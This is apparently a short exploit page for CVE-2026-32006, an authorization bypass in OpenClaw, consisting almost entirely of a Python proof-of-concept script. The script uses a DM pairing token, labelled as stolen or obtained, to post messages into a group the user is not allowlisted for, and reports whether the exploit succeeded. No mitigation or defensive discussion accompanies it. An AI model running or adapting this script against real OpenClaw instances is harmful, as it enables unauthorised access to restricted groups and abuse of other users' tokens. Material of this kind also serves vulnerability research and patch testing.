CVE-2026-32006 OpenClaw授权绕过漏洞

import requests # Exploit for CVE-2026-32006: OpenClaw Authorization Bypass # Description: Send a message to a restricted group using DM pairing identity. # Target requires dmPolicy=pairing and groupPolicy=allowlist. target_url = "https://example-openclaw-instance/api/v1/groups/{group_id}/messages" dm_token = "STOLEN_OR_OBTAINED_DM_PAIRING_TOKEN" headers = { "Authorization": f"Bearer {dm_token}", "Content-Type": "application/json" } payload = { "content": "This message was sent bypassing group allowlist checks using CVE-2026-32006." } try: # Attempt to send message to a group the user is not explicitly whitelisted in response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Message sent to group.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")